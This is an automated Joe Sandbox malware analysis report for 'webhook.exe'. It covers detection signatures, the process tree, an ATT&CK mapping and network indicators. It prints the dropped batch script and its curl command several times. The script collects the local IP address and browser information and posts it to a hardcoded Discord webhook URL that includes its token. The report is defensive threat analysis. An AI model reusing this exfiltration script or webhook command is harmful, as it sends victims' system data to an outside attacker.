Edit tour

Windows Analysis Report
webhook.exe

Overview

General Information

Sample name:	webhook.exe
Analysis ID:	1575685
MD5:	5765bde6d3062b30890598996b671db0
SHA1:	5b36dcecd5e3ba131fc05973179bffbbec08291d
SHA256:	ebc2dba491422a0c420cc22ffe91483fe4885ecfae57baa2ed207252d9afd5de
Tags:	exeRedlineStealeruser-lontze7
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Uses ipconfig to lookup or modify the Windows network settings

Binary contains a suspicious time stamp

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain checking for process token information

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains executable resources (Code or Archives)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Recon Command Output Piped To Findstr.EXE

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

webhook.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\webhook.exe" MD5: 5765BDE6D3062B30890598996B671DB0)

cmd.exe (PID: 6764 cmdline: cmd /c "webhook.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2336 cmdline: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

ipconfig.exe (PID: 1928 cmdline: ipconfig MD5: 62F170FB07FDBB79CEB7147101406EB8)

findstr.exe (PID: 2044 cmdline: findstr /i "IPv4" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

curl.exe (PID: 3340 cmdline: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\webhook.exe, ProcessId: 6476, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Sigma detected: Recon Command Output Piped To Findstr.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4", CommandLine: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: cmd /c "webhook.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4", ProcessId: 2336, ProcessName: cmd.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ", CommandLine: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: cmd /c "webhook.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ", ProcessId: 3340, ProcessName: curl.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: webhook.exe

Virustotal: Detection: 11%

Perma Link

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF6505446E8 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,

0_2_00007FF6505446E8

Source: unknown

HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: webhook.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wextract.pdb source: webhook.exe
Source:	Binary string: wextract.pdbGCTL source: webhook.exe

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF6505426B8 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00007FF6505426B8

Source: Joe Sandbox View

IP Address: 162.159.138.232 162.159.138.232

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ HTTP/1.1Host: discord.comUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 57

Source: curl.exe, 00000006.00000003.1800142833.0000029D6A88A000.00000004.00000020.00020000.00000000.sdmp, webhook.bat.0.dr

String found in binary or memory: https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEp

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown

HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650547FE4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,		0_2_00007FF650547FE4
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF6505433BC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,		0_2_00007FF6505433BC

Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650545B50	0_2_00007FF650545B50
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF65054521C	0_2_00007FF65054521C
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF65054721C	0_2_00007FF65054721C
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650541A08	0_2_00007FF650541A08
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650545810	0_2_00007FF650545810
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650544BE0	0_2_00007FF650544BE0
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF6505478AE	0_2_00007FF6505478AE
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650544BDE	0_2_00007FF650544BDE
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF6505433BC	0_2_00007FF6505433BC

Source: webhook.exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 730 bytes, 1 file, at 0x2c +A "webhook.bat", ID 1108, number 1, 1 datablock, 0x1503 compression

Source: webhook.exe	Binary or memory string: OriginalFilename vs webhook.exe
Source: webhook.exe, 00000000.00000000.1768842974.00007FF65054E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs webhook.exe
Source: webhook.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs webhook.exe

Source: classification engine

Classification label: mal52.winEXE@12/2@1/2

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF650545B50 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00007FF650545B50

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF6505433BC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

0_2_00007FF6505433BC

Source: C:\Users\user\Desktop\webhook.exe

0_2_00007FF650545B50

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF650545140 FindResourceExA,SizeofResource,FindResourceA,LoadResource,LockResource,memcpy_s,FreeResource,

0_2_00007FF650545140

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03

Source: C:\Users\user\Desktop\webhook.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\webhook.exe

Process created: C:\Windows\System32\cmd.exe cmd /c "webhook.bat"

Source: webhook.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\webhook.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: webhook.exe

Virustotal: Detection: 11%

Source: unknown	Process created: C:\Users\user\Desktop\webhook.exe "C:\Users\user\Desktop\webhook.exe"
Source: C:\Users\user\Desktop\webhook.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "webhook.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig \| findstr /i "IPv4"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "IPv4"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"
Source: C:\Users\user\Desktop\webhook.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "webhook.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig \| findstr /i "IPv4"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "IPv4"	Jump to behavior

Source: C:\Users\user\Desktop\webhook.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Section loaded: advpack.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: webhook.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: webhook.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: webhook.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: webhook.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: webhook.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: webhook.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: webhook.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: webhook.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: webhook.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: webhook.exe
Source:	Binary string: wextract.pdbGCTL source: webhook.exe

Source: webhook.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: webhook.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: webhook.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: webhook.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: webhook.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: webhook.exe

Static PE information: 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF650541A08 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

0_2_00007FF650541A08

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF650541D28 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

0_2_00007FF650541D28

Source: C:\Users\user\Desktop\webhook.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\webhook.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\webhook.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-2516

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF6505426B8 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00007FF6505426B8

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF6505441EC GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00007FF6505441EC

Source: curl.exe, 00000006.00000003.1800196203.0000029D6A865000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\webhook.exe

0_2_00007FF650541A08

Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF650541404 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF650541404
Source: C:\Users\user\Desktop\webhook.exe	Code function: 0_2_00007FF65054170E SetUnhandledExceptionFilter,		0_2_00007FF65054170E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig \| findstr /i "IPv4"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "IPv4"	Jump to behavior

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF650542590 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_00007FF650542590

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF6505418E4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

0_2_00007FF6505418E4

Source: C:\Users\user\Desktop\webhook.exe

Code function: 0_2_00007FF650547FE4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

0_2_00007FF650547FE4

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Native API	1 Scripting	1 Access Token Manipulation	1 Access Token Manipulation	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	11 Process Injection	11 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Timestomp	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	5 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
webhook.exe	5%	ReversingLabs
webhook.exe	11%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
discord.com	162.159.138.232	true	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.138.232	discord.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575685
Start date and time:	2024-12-16 08:29:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	webhook.exe
Detection:	MAL
Classification:	mal52.winEXE@12/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 27 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Not all processes where analyzed, report is missing behavior information

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.138.232	chos.exe	Get hash	malicious	Unknown	Browse
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	RuntimeusererVers.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	CStealer	Browse
	dens.exe	Get hash	malicious	Python Stealer, Exela Stealer, Waltuhium Grabber	Browse
	yuki.exe	Get hash	malicious	Luna Stealer	Browse
	file.exe	Get hash	malicious	Growtopia	Browse
	SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	zapret.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	162.159.137.232
	chos.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	phost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	ihost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse	162.159.136.232
	shost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse	162.159.136.232
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	ahost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	givenbestupdatedoingformebestthingswithgreatnewsformegive.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	clearentirethingwithbestnoticetheeverythinggooodfrome.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa	Get hash	malicious	Unknown	Browse	104.26.10.61
	https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=	Get hash	malicious	Unknown	Browse	104.21.89.91
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.79.7
	http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450	Get hash	malicious	Unknown	Browse	172.67.41.229
	1.elf	Get hash	malicious	Unknown	Browse	1.8.62.108
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar, Xmrig	Browse	104.21.79.7
	Setup.msi	Get hash	malicious	Vidar	Browse	104.21.52.25
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	172.67.164.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	loader.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	loader.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	chos.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	file.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	162.159.138.232
	Document.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.159.138.232
	aLsxeH29P2.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	c9a6BV0eQO.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	new.ini.ps1	Get hash	malicious	Unknown	Browse	162.159.138.232

Process:	C:\Users\user\Desktop\webhook.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1040
Entropy (8bit):	5.237069171825323
Encrypted:	false
SSDEEP:	24:wEzHn8moNE/ipwBpy7Li1Yro5nyeGxq2GNC/HKlP:NH8moqaGbyni1YMgHq2cCPe
MD5:	55FDC03CE6D4C46489CA4DB903729D1C
SHA1:	97D9343B85C6310C975D9825DB1C7D905E5EBBA3
SHA-256:	D792224465EA5564F3698F05936E60A24551F51251FE4DD820919639F4586990
SHA-512:	807E52DF55A1654E4B7E33BEC557887B6C471437574E196267699AB6908808E6DCB78016B3C0B5D97E7730E0D6C56BFA3BB39BC82FE06BB2D50E1D81D3023D58
Malicious:	false
Reputation:	low
Preview:	@echo off..setlocal....:: Replace this with your actual webhook URL..set "webhook_url=https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"....:: Get the local IP address..for /f "tokens=2 delims=:" %%a in ('ipconfig ^\| findstr /i "IPv4"') do set "ip=%%a"..set "ip=%ip:~1%"....:: Check if Google Chrome is installed..set "chrome_installed="..if exist "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" (.. set "chrome_installed=Chrome is installed."..) else (.. set "chrome_installed=Chrome is not installed."..)....:: Set the message with the IP address and browser info..set "message=My local IP address is: %ip%`n%s"....:: Create a temporary JSON file..set "temp_json=%temp%\discord_webhook.json"..(.. echo {.. echo "content": "%message%".. echo }..) > "%temp_json%"....:: Send the POST request using curl..curl -H "Content-Type: application/json" -d @"%temp_json%" "%webhook_url%"....:: Clean up..

C:\Users\user\AppData\Local\Temp\discord_webhook.json

Download File

